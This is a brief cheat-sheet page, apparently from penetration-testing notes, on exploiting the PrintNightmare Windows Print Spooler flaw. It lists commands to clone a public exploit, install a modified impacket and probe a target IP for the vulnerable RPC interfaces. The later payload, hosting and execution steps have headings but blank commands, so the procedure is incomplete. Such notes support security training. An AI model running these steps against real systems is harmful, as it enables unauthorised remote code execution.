PrintNightmare
PrintNightmare is a critical Windows vulnerability that allows remote code execution by exploiting the Windows Print Spooler service.
1. Clone PrintNightmare Exploit Repository
Command:
git clone https://github.com/cube0x0/CVE-2021-1675.git2. Install Required Impacket Version
Command:
pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install3. Check if Target is Vulnerable
Command:
rpcdump.py @172.16.5.5 | egrep 'MS-RPRN|MSPAR'4. Generate DLL Payload
Command:
5. Host DLL Payload Using SMB Server
Command:
6. Execute the Exploit
Command:
Last updated